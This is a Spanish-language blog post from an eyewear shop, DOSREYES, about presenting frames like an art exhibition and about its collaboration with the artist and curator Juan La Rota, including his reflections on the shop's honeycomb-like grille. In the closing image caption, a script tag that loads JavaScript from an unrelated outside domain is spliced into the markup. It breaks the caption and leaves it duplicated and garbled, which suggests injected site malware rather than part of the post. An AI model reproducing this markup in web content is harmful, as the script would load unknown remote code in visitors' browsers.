ARTE, GAFAS DE DISENADOR, MONTURAS, Uncategorized

Curaduría de Monturas v.2.0

 

Voy a empezar con una generalidad: las personas llegan a nuestro espacio y no están seguras si es una exhibición artística o si las monturas expuestas están a la venta. El formato de nuestra tienda definitivamente rompe con los esquemas comerciales tradicionales: no hay ningún objeto de comunicación que especifique que los productos están a la venta; no existe publicidad de ninguna de las marcas expuestas; en lugar de los transparentes y claros vidrios tenemos una reja hexagonal que se asimila a las paredes de un panal de abejas,   y la persona encargada del espacio no es un vendedor, es un artista.

Desde que empezamos con DOSREYES tuvimos la idea de hacer una ‘curaduría’ de los productos buscando presentar alternativas responsables y únicas en el mundo óptico. Nuestra exhibición fue pensada como si se fuera a presentar en una galería y de hecho el lanzamiento fue en un espacio de artistas. Tiene sentido que la persona encargada de llevar los hilos de nuestro espacio cuente no solamente con el conocimiento técnico óptico sino con una sensibilidad particular. Pero, cómo lograr ‘enganchar’ un artista para sacarlo de su mundo y plantarlo en una tienda?

COLABORACIÓN

Decidimos salir a la búsqueda de nuestro artista con la firme intención de colaborar: el nos irradia con su sensibilidad, gusto, ideas y nosotros le damos un espacio para trabajar y experimentar. Giramos alrededor de las gafas y nuestro artista es el curador: el hace parte del equipo que selecciona las piezas que vamos a exhibir y hace la curaduría de 4 exhibiciones artísticas anuales que nosotros co-producimos.

Quiero presentarles a Juan La Rota, cineasta de profesión y con dos maestrías en arte, una en Francia y otra en España. Su trabajo es muy conceptual y se sitúa entre la escultura, el objeto y el video. Desde mi punto de vista,  su trabajo resalta por sus sutilezas que generan sensaciones físicas y filosóficas en el momento que son descubiertas por el observador.

Arranca nuestra colaboración con Juan que nos va a presentar su  punto de vista por medio de imágenes, palabras, ideas. Curaduría de Monturas versión 2.0 sale de su versión ‘Beta’ y comienza en DOSREYES.

 

Acerca de nuestra reja hexagonal escribe Juan:

A mi me parece y siempre me ha parecido muy análogo a la estructura de una colmena.

Las abejas…, en virtud de una cierta intuición geométrica…, saben que el hexágono es mayor que el cuadrado y que el triángulo, y que podrá contener más miel con el mismo gasto de material.

Pappus de Alejandría

Me gusta mucho esa analogía, tiene implícita la noción de trabajo en equipo, eficiencia, y producción de algo muy exclusivo y delicioso para el deleite de seres humanos y osos… [Los hay algunos de anteojos]
También es la estructura que resulta de la reunión y contención de las expediciones y coqueteos de estos animales con algunas flores…
Algo que me parece muy paradójico es que en la colmena vive una reina. Ademas leí y la forma optima que quisieran construir las abejas son los círculos, cualidad que por semejanza se haya una vez pasamos esos hexágonos. Bueno eso es lo que veo yo de la reja, para mi es una colmena en alambre para Dosreyes.

 

panal-de-gafas

Toca cerrar un ojo, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'><figcaption class= después el otro y desplazarse el espacio de una nariz / entre la nariz) es un autorretrato hecho con tinta azul sobre un espejo. Juan La Rota, 2013-2014″ width=”1000″ height=”1390″ /> Toca cerrar un ojo, después el otro y desplazarse el espacio de una nariz / entre la nariz) es un autorretrato hecho con tinta azul sobre un espejo. Juan La Rota, 2013-2014

Al lado izquierdo tenemos el autorretrato de Juan y al lado derecho al oso de anteojos.

 

oso_de_anteojos

1

Leave a Reply